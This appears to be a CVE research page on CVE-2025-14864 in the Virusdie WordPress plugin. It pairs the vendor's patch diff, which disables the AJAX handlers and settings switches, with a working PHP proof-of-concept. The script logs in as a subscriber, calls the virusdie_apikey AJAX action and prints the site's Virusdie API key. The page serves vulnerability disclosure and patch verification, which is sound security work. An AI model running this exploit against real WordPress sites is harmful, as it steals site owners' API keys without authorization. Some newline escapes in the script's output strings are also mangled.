CVE-2025-14864: Virusdie <= 1.1.7 – Missing Authorization to Authenticated (Subscriber+) API Key Disclosure (virusdie)

--- a/virusdie/inc/class-virusdie.php
+++ b/virusdie/inc/class-virusdie.php
@@ -67,12 +67,12 @@

 		add_filter( 'plugin_action_links_' . plugin_basename( VDWS_VIRUSDIE_PLUGIN_FILE ), array( $this, 'page_plugin_action' ) );

-		add_action( 'wp_ajax_virusdie_switcher', 'VDWS_VirusdieBehavior::vd_switcher' );
+		// add_action( 'wp_ajax_virusdie_switcher', 'VDWS_VirusdieBehavior::vd_switcher' );
 		// add_action( 'wp_ajax_nopriv_virusdie_switcher', 'VDWS_VirusdieBehavior::vd_switcher' ); // Will be used in future versions
-		add_action( 'wp_ajax_virusdie_start_scan', 'VDWS_VirusdieBehavior::vd_scan_start' );
-		add_action( 'wp_ajax_virusdie_get_progress', 'VDWS_VirusdieBehavior::vd_get_progress' );
-		add_action( 'wp_ajax_virusdie_apikey', 'VDWS_VirusdieBehavior::vd_get_apikey' );
-		add_action( 'wp_ajax_virusdie_resend', 'VDWS_VirusdieBehavior::vd_resend' );
+		// add_action( 'wp_ajax_virusdie_start_scan', 'VDWS_VirusdieBehavior::vd_scan_start' );
+		// add_action( 'wp_ajax_virusdie_get_progress', 'VDWS_VirusdieBehavior::vd_get_progress' );
+		// add_action( 'wp_ajax_virusdie_apikey', 'VDWS_VirusdieBehavior::vd_get_apikey' );
+		// add_action( 'wp_ajax_virusdie_resend', 'VDWS_VirusdieBehavior::vd_resend' );
 	}

 	/**
@@ -126,17 +126,15 @@
 	{
 		$screen = get_current_screen();
 		// Don't enqueue anything unless we're on the virusdie page.
-		if ( ( !isset($_GET['page']) || 'virusdie' !== $_GET['page']) && !in_array($screen->base, array(
-				'dashboard',
-				'welcome',
-				'scan-start',
-				'scan-error',
-				'error',
-			))) {
-				return;
+		if (
+			(!isset($_GET['page']) || 'virusdie' !== $_GET['page']) &&
+			!in_array($screen->base, array('dashboard','welcome','scan-start','scan-error','error'))
+		) {
+			return;
 		}
+		$tab = self::get_current_tab();
 		wp_enqueue_style('virusdie-style', constant('VDWS_VIRUSDIE_PLUGIN_URL') . 'assets/css/virusdie.css', array(), constant('VDWS_VIRUSDIE_PLUGIN_VERSION'));
-		if (in_array(self::$tab, array('free', 'premium'))) {
+		if ( $tab === 'free' || $tab === 'premium' ) {
 			wp_enqueue_style('jvector-virusdie-style', constant('VDWS_VIRUSDIE_PLUGIN_URL') . 'assets/css/jquery-jvectormap-2.0.5.css', array('virusdie-style'), constant('VDWS_VIRUSDIE_PLUGIN_VERSION'));
 		}
 	}
@@ -159,37 +157,34 @@
 		// Don't enqueue anything unless we're on the virusdie page.
 		if (
 			(!isset($_GET['page']) || 'virusdie' !== $_GET['page']) &&
-			!in_array($screen->base, array('dashboard', 'welcome', 'scan-start', 'scan-error', 'error'))
+			!in_array($screen->base, array('dashboard','welcome','scan-start','scan-error','error'))
 		) {
 			return;
 		}
-		$tab = VDWS_Virusdie::get_current_tab();
+		$tab = self::get_current_tab();
 		wp_enqueue_script( 'socket-io-virusdie', constant('VDWS_VIRUSDIE_SITE_PANEL') . '/socket.io/socket.io.js', array(), null, true);
 		wp_enqueue_script( 'socketio-virusdie', constant('VDWS_VIRUSDIE_PLUGIN_URL') . 'assets/js/vdws-socketio.js', array('socket-io-virusdie'), null, true);
-		if ( $tab === 'auth-pass' ) {
+		/* if ( $tab === 'auth-pass' ) {
 			wp_enqueue_script( 'auth-pass-virusdie', constant('VDWS_VIRUSDIE_PLUGIN_URL') . 'assets/js/vdws-resend.js');
-		}
-		if ( in_array($tab, array('free', 'premium') ) ) {
+		} elseif ( $tab === 'scan-start' ) {
+			wp_enqueue_script( 'progressbar-virusdie', constant('VDWS_VIRUSDIE_PLUGIN_URL') . 'assets/js/progressbar.js', array(), null, true);
+			wp_enqueue_script( 'scanner-virusdie', constant('VDWS_VIRUSDIE_PLUGIN_URL') . 'assets/js/vdws-scanner.js', array('progressbar-virusdie'), null, true);
+		} else */
+		if ( $tab === 'free' || $tab === 'premium' ) {
 			wp_enqueue_script( 'sweetalert2-virusdie', constant('VDWS_VIRUSDIE_PLUGIN_URL') . 'assets/js/sweetalert2.all.min.js', array(), null, true);
 			wp_enqueue_script( 'jvector-virusdie', constant('VDWS_VIRUSDIE_PLUGIN_URL') . 'assets/js/jquery-jvectormap-2.0.5.min.js', array('jquery'), null, true);
 			wp_enqueue_script( 'world-virusdie', constant('VDWS_VIRUSDIE_PLUGIN_URL') . 'assets/js/jquery-jvectormap-world-mill.js', array('jvector-virusdie'), null, true);
 			wp_enqueue_script( 'map-virusdie', constant('VDWS_VIRUSDIE_PLUGIN_URL') . 'assets/js/vdws-map.js', array('jvector-virusdie', 'world-virusdie'), null, true);
-		}
-		if ( $tab === 'free' ) {
-			wp_enqueue_script( 'modals-virusdie', constant('VDWS_VIRUSDIE_PLUGIN_URL') . 'assets/js/vdws-modals.js', array(), null, true);
-		}
-		if ( $tab === 'premium' ) {
-			wp_enqueue_script( 'switcher-virusdie', constant('VDWS_VIRUSDIE_PLUGIN_URL') . 'assets/js/vdws-switcher.js', array(), null, true);
-		}
-		if ( $tab === 'scan-start' ) {
-			wp_enqueue_script( 'progressbar-virusdie', constant('VDWS_VIRUSDIE_PLUGIN_URL') . 'assets/js/progressbar.js', array(), null, true);
-			wp_enqueue_script( 'scanner-virusdie', constant('VDWS_VIRUSDIE_PLUGIN_URL') . 'assets/js/vdws-scanner.js', array('progressbar-virusdie'), null, true);
-		}
-		if ( $tab === 'welcome' ) {
+			if ( $tab === 'free' ) {
+				wp_enqueue_script( 'modals-virusdie', constant('VDWS_VIRUSDIE_PLUGIN_URL') . 'assets/js/vdws-modals.js', array(), null, true);
+			} elseif ( $tab === 'premium' ) {
+				// wp_enqueue_script( 'switcher-virusdie', constant('VDWS_VIRUSDIE_PLUGIN_URL') . 'assets/js/vdws-switcher.js', array(), null, true);
+			}
+		} elseif ( $tab === 'welcome' ) {
 			wp_enqueue_script( 'tiny-slider-virusdie', constant('VDWS_VIRUSDIE_PLUGIN_URL') . 'assets/js/tiny-slider.js', array(), null, true);
 			wp_enqueue_script( 'slider-virusdie', constant('VDWS_VIRUSDIE_PLUGIN_URL') . 'assets/js/vdws-slider.js', array(), null, true);
 		}
-		if ( in_array($tab, array('free','premium','scan-start','scan-error','welcome', 'error') ) ) {
+		if ( in_array($tab, array('free','premium','scan-start','scan-error','welcome','error')) ) {
 			wp_enqueue_script( 'usermenu-virusdie', constant('VDWS_VIRUSDIE_PLUGIN_URL') . 'assets/js/vdws-usermenu.js', array(), null, true);
 		}
 	}
@@ -300,8 +295,6 @@
 	/**
 	 * Render our admin page.
 	 *
-	 * @uses VDWS_Virusdie::get_current_tab()
-	 *
 	 * @return void
 	 */
 	public function dashboard_page()
--- a/virusdie/inc/tools/class-virusdie-behavior.php
+++ b/virusdie/inc/tools/class-virusdie-behavior.php
@@ -51,7 +51,7 @@
 				'site' => $this->site,
 				'user' => $this->user,
 				'fw_ping' => !empty($this->user) &&
-					($ping = file_get_contents($_SERVER['REQUEST_SCHEME'].'://'.$_SERVER['SERVER_NAME'].'/?fw_t=ping&fw_k='.md5($this->user->getSyncFileName()))) &&
+					($ping = file_get_contents((isset($_SERVER['REQUEST_SCHEME']) ? $_SERVER['REQUEST_SCHEME'] : 'http').'://'.$_SERVER['SERVER_NAME'].'/?fw_t=ping&fw_k='.md5($this->user->getSyncFileName()))) &&
 					($ping = json_decode($ping, true)) && !empty($ping['status']),
 			),
 			'footer' => array(
@@ -188,6 +188,7 @@
 		return false;
 	}

+	/*
 	public static function canDoAjax()
 	{
 		if (!current_user_can('manage_options')) {
@@ -271,5 +272,6 @@
 		}
 		wp_die(VDWS_VirusdieApiClient::signup($_POST['vd_email'], $err));
 	}
+	*/

 }
 No newline at end of file
--- a/virusdie/views/auth-pass.php
+++ b/virusdie/views/auth-pass.php
@@ -25,7 +25,7 @@
 				</p>
 				<div class="vd-auth__btns">
 					<button type="submit" class="vd-btn --green">Confirm one-time password</button>
-					<a href="" id="resend" class="vd-auth__link">Get one more one-time password</a>
+					<!-- <a href="" id="resend" class="vd-auth__link">Get one more one-time password</a> -->
 				</div>
 			</form>
 		</div>
--- a/virusdie/views/free.php
+++ b/virusdie/views/free.php
@@ -104,14 +104,14 @@
 				<div class="vd-antivirus__ctrl-block">
 					<span class="vd-antivirus__ctrl-text">Daily scans</span>
 					<label class="vd-switch-block__control --m-0" for="onDailyScans">
-						<input id="onDailyScans" type="checkbox" name="onDailyScans" class="vd-js-switch" data-available="off" <?php echo $vd_site->isDailyScan() ? 'checked' : ''; ?> />
+						<input id="onDailyScans" type="checkbox" name="onDailyScans" class="vd-js-switch" data-available="off" disabled <?php echo $vd_site->isDailyScan() ? 'checked' : ''; ?> />
 						<span class="vd-switch-block__slider --round --green"></span>
 					</label>
 				</div>
 				<div class="vd-antivirus__ctrl-block">
 					<span class="vd-antivirus__ctrl-text">Automatic website cleanup</span>
 					<label class="vd-switch-block__control --m-0" for="onAutoClean">
-						<input id="onAutoClean" type="checkbox" name="onAutoClean" class="vd-js-switch" data-available="off" <?php echo $vd_site->isAutoTreatment() ? 'checked' : ''; ?> ?> />
+						<input id="onAutoClean" type="checkbox" name="onAutoClean" class="vd-js-switch" data-available="off" disabled <?php echo $vd_site->isAutoTreatment() ? 'checked' : ''; ?> />
 						<span class="vd-switch-block__slider --round --green"></span>
 					</label>
 				</div>
@@ -154,7 +154,7 @@
 			<div class="vd-patchmanager__head">
 				<span class="vd-patchmanager__header">Patch Manager<mark>Premium</mark></span>
 				<label class="vd-switch-block__control --m-0" for="onPatchManager">
-					<input id="onPatchManager" type="checkbox" name="onPatchManager" class="vd-js-switch" data-available="off" <?php echo $vd_site->isPatchManager() ? 'checked' : ''; ?> />
+					<input id="onPatchManager" type="checkbox" name="onPatchManager" class="vd-js-switch" data-available="off" disabled <?php echo $vd_site->isPatchManager() ? 'checked' : ''; ?> />
 					<span class="vd-switch-block__slider --round --green"></span>
 				</label>
 			</div>
@@ -196,7 +196,7 @@
 			<div class="vd-fwall__head">
 				<span class="vd-fwall__header">Website Firewall<mark>Premium</mark></span>
 				<label class="vd-switch-block__control --m-0" for="onFireWall">
-					<input id="onFireWall" type="checkbox" name="onFireWall" class="vd-js-switch" data-available="off" <?php echo $vd_site->isFirewallOn() ? 'checked' : ''; ?> />
+					<input id="onFireWall" type="checkbox" name="onFireWall" class="vd-js-switch" data-available="off" disabled <?php echo $vd_site->isFirewallOn() ? 'checked' : ''; ?> />
 					<span class="vd-switch-block__slider --round --green"></span>
 				</label>
 			</div>
@@ -298,7 +298,7 @@
 						</p>
 					</div>
 					<label class="vd-switch-block__control --m-0 --green-border" for="onSecDailyScans">
-						<input id="onSecDailyScans" type="checkbox" name="onDailyScansSec" class="vd-js-switch" data-available="off" <?php echo $vd_site->isDailyScan() ? 'checked' : ''; ?> />
+						<input id="onSecDailyScans" type="checkbox" name="onDailyScansSec" class="vd-js-switch" data-available="off" disabled <?php echo $vd_site->isDailyScan() ? 'checked' : ''; ?> />
 						<span class="vd-switch-block__slider --round --green-border"></span>
 					</label>
 				</div>
@@ -310,7 +310,7 @@
 						</p>
 					</div>
 					<label class="vd-switch-block__control --m-0 --green-border" for="onSecAutoClean">
-						<input id="onSecAutoClean" type="checkbox" name="onAutoCleanSec" data-available="off" class="vd-js-switch" <?php echo $vd_site->isAutoTreatment() ? 'checked' : ''; ?> />
+						<input id="onSecAutoClean" type="checkbox" name="onAutoCleanSec" data-available="off" class="vd-js-switch" disabled <?php echo $vd_site->isAutoTreatment() ? 'checked' : ''; ?> />
 						<span class="vd-switch-block__slider --round --green-border"></span>
 					</label>
 				</div>
@@ -322,7 +322,7 @@
 						</p>
 					</div>
 					<label class="vd-switch-block__control --m-0 --green-border" for="onSecFireWall">
-						<input id="onSecFireWall" type="checkbox" name="onFireWallSec" data-available="off" class="vd-js-switch" <?php echo $vd_site->isFirewallOn() ? 'checked' : ''; ?> />
+						<input id="onSecFireWall" type="checkbox" name="onFireWallSec" data-available="off" class="vd-js-switch" disabled <?php echo $vd_site->isFirewallOn() ? 'checked' : ''; ?> />
 						<span class="vd-switch-block__slider --round --green-border"></span>
 					</label>
 				</div>
@@ -334,7 +334,7 @@
 						</p>
 					</div>
 					<label class="vd-switch-block__control --m-0 --green-border" for="onSecFixPatching">
-						<input id="onSecFixPatching" type="checkbox" name="onPatchManagerSec" data-available="off" class="vd-js-switch" <?php echo $vd_site->isPatchManager() ? 'checked' : ''; ?> />
+						<input id="onSecFixPatching" type="checkbox" name="onPatchManagerSec" data-available="off" class="vd-js-switch" disabled <?php echo $vd_site->isPatchManager() ? 'checked' : ''; ?> />
 						<span class="vd-switch-block__slider --round --green-border"></span>
 					</label>
 				</div>
@@ -347,7 +347,7 @@
 						</p>
 					</div>
 					<label class="vd-switch-block__control --m-0 --green-border" for="onInsuranceSec">
-						<input id="onInsuranceSec" type="checkbox" name="onInsuranceSec" data-available="off" disabled="disabled">
+						<input id="onInsuranceSec" type="checkbox" name="onInsuranceSec" data-available="off" disabled />
 						<span class="vd-switch-block__slider --round --green-border"></span>
 					</label>
 				</div>
--- a/virusdie/views/premium.php
+++ b/virusdie/views/premium.php
@@ -80,14 +80,14 @@
 				<div class="vd-antivirus__ctrl-block">
 					<span class="vd-antivirus__ctrl-text">Daily scans</span>
 					<label class="vd-switch-block__control --m-0" for="onDailyScans">
-						<input id="onDailyScans" type="checkbox" name="onDailyScans" class="vd-js-switch" data-available="on" <?php echo $vd_site->isDailyScan() ? 'checked' : ''; ?> />
+						<input id="onDailyScans" type="checkbox" name="onDailyScans" class="vd-js-switch" data-available="on" disabled <?php echo $vd_site->isDailyScan() ? 'checked' : ''; ?> />
 						<span class="vd-switch-block__slider --round --green"></span>
 					</label>
 				</div>
 				<div class="vd-antivirus__ctrl-block">
 					<span class="vd-antivirus__ctrl-text">Automatic website cleanup</span>
 					<label class="vd-switch-block__control --m-0" for="onAutoClean">
-						<input id="onAutoClean" type="checkbox" name="onAutoClean" class="vd-js-switch" data-available="on" <?php echo $vd_site->isAutoTreatment() ? 'checked' : ''; ?> ?> />
+						<input id="onAutoClean" type="checkbox" name="onAutoClean" class="vd-js-switch" data-available="on" disabled <?php echo $vd_site->isAutoTreatment() ? 'checked' : ''; ?> />
 						<span class="vd-switch-block__slider --round --green"></span>
 					</label>
 				</div>
@@ -130,7 +130,7 @@
 			<div class="vd-patchmanager__head">
 				<span class="vd-patchmanager__header">Patch Manager<mark>Premium</mark></span>
 				<label class="vd-switch-block__control --m-0" for="onPatchManager">
-					<input id="onPatchManager" type="checkbox" name="onPatchManager" class="vd-js-switch" data-available="on" <?php echo $vd_site->isPatchManager() ? 'checked' : ''; ?> />
+					<input id="onPatchManager" type="checkbox" name="onPatchManager" class="vd-js-switch" data-available="on" disabled <?php echo $vd_site->isPatchManager() ? 'checked' : ''; ?> />
 					<span class="vd-switch-block__slider --round --green"></span>
 				</label>
 			</div>
@@ -164,7 +164,7 @@
 			<div class="vd-fwall__head">
 				<span class="vd-fwall__header">Website Firewall<mark>Premium</mark></span>
 				<label class="vd-switch-block__control --m-0" for="onFireWall">
-					<input id="onFireWall" type="checkbox" name="onFireWall" class="vd-js-switch" data-available="on" <?php echo $vd_site->isFirewallOn() ? 'checked' : ''; ?> />
+					<input id="onFireWall" type="checkbox" name="onFireWall" class="vd-js-switch" data-available="on" disabled <?php echo $vd_site->isFirewallOn() ? 'checked' : ''; ?> />
 					<span class="vd-switch-block__slider --round --green"></span>
 				</label>
 			</div>
@@ -258,7 +258,7 @@
 						</p>
 					</div>
 					<label class="vd-switch-block__control --m-0 --green-border" for="onDailyScansSec">
-						<input id="onDailyScansSec" type="checkbox" name="onDailyScansSec" class="vd-js-switch" data-available="on" <?php echo $vd_site->isDailyScan() ? 'checked' : ''; ?> />
+						<input id="onDailyScansSec" type="checkbox" name="onDailyScansSec" class="vd-js-switch" data-available="on" disabled <?php echo $vd_site->isDailyScan() ? 'checked' : ''; ?> />
 						<span class="vd-switch-block__slider --round --green-border"></span>
 					</label>
 				</div>
@@ -270,7 +270,7 @@
 						</p>
 					</div>
 					<label class="vd-switch-block__control --m-0 --green-border" for="onAutoCleanSec">
-						<input id="onAutoCleanSec" type="checkbox" name="onAutoCleanSec" data-available="on" class="vd-js-switch" <?php echo $vd_site->isAutoTreatment() ? 'checked' : ''; ?> />
+						<input id="onAutoCleanSec" type="checkbox" name="onAutoCleanSec" data-available="on" class="vd-js-switch" disabled <?php echo $vd_site->isAutoTreatment() ? 'checked' : ''; ?> />
 						<span class="vd-switch-block__slider --round --green-border"></span>
 					</label>
 				</div>
@@ -282,7 +282,7 @@
 						</p>
 					</div>
 					<label class="vd-switch-block__control --m-0 --green-border" for="onFireWallSec">
-						<input id="onFireWallSec" type="checkbox" name="onFireWallSec" data-available="on" class="vd-js-switch" <?php echo $vd_site->isFirewallOn() ? 'checked' : ''; ?> />
+						<input id="onFireWallSec" type="checkbox" name="onFireWallSec" data-available="on" class="vd-js-switch" disabled <?php echo $vd_site->isFirewallOn() ? 'checked' : ''; ?> />
 						<span class="vd-switch-block__slider --round --green-border"></span>
 					</label>
 				</div>
@@ -294,7 +294,7 @@
 						</p>
 					</div>
 					<label class="vd-switch-block__control --m-0 --green-border" for="onPatchManagerSec">
-						<input id="onPatchManagerSec" type="checkbox" name="onPatchManagerSec" data-available="on" class="vd-js-switch" <?php echo $vd_site->isPatchManager() ? 'checked' : ''; ?> />
+						<input id="onPatchManagerSec" type="checkbox" name="onPatchManagerSec" data-available="on" class="vd-js-switch" disabled <?php echo $vd_site->isPatchManager() ? 'checked' : ''; ?> />
 						<span class="vd-switch-block__slider --round --green-border"></span>
 					</label>
 				</div>
@@ -307,7 +307,7 @@
 						</p>
 					</div>
 					<label class="vd-switch-block__control --m-0 --green-border" for="onInsuranceSec">
-						<input id="onInsuranceSec" type="checkbox" name="onInsuranceSec" data-available="on" disabled="disabled">
+						<input id="onInsuranceSec" type="checkbox" name="onInsuranceSec" data-available="on" disabled />
 						<span class="vd-switch-block__slider --round --green-border"></span>
 					</label>
 				</div>
--- a/virusdie/virusdie.php
+++ b/virusdie/virusdie.php
@@ -8,7 +8,7 @@
  * Plugin Name: Virusdie | One-click website security
  * Description: One-Click Website security with Virusdie Wordpress Plugin
  * Author: Virusdie
- * Version: 1.1.7
+ * Version: 1.1.8
  * Requires PHP: 5.6
  * Author URI: https://virusdie.com
  * License: GPLv2
@@ -25,7 +25,7 @@
 }

 // Plugin version, name, path, URL
-define( 'VDWS_VIRUSDIE_PLUGIN_VERSION',   '1.1.7' );
+define( 'VDWS_VIRUSDIE_PLUGIN_VERSION',   '1.1.8' );
 define( 'VDWS_VIRUSDIE_PLUGIN_DIRECTORY', trailingslashit( plugin_dir_path( __FILE__ ) ) );
 define( 'VDWS_VIRUSDIE_PLUGIN_URL',       trailingslashit( plugins_url( '/', __FILE__ ) ) );
 define( 'VDWS_VIRUSDIE_PLUGIN_ADMIN_URL', admin_url( 'admin.php?page=virusdie', is_ssl() ? 'https' : 'http' ) );

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14864 - Virusdie <= 1.1.7 - Missing Authorization to Authenticated (Subscriber+) API Key Disclosure

<?php

$target_url = 'https://example.com/wp-admin/admin-ajax.php';
$username = 'subscriber_user';
$password = 'subscriber_pass';

// Initialize cURL session for WordPress login
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, str_replace('/wp-admin/admin-ajax.php', '/wp-login.php', $target_url));
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => admin_url(),
    'testcookie' => 1
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Execute login
$response = curl_exec($ch);

// Check if login succeeded by looking for dashboard elements
if (strpos($response, 'wp-admin') === false && strpos($response, 'Dashboard') === false) {
    die('Login failed. Check credentials.');
}

// Now exploit the vulnerable AJAX endpoint
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'action' => 'virusdie_apikey'
]));

$response = curl_exec($ch);
curl_close($ch);

// Parse and display the API key
$data = json_decode($response, true);
if (json_last_error() === JSON_ERROR_NONE && isset($data['apikey'])) {
    echo "Virusdie API Key: " . $data['apikey'] . "n";
    echo "Vulnerability confirmed.n";
} else {
    echo "Failed to retrieve API key. Response: " . htmlspecialchars($response) . "n";
    echo "Target may be patched or plugin not active.n";
}

?>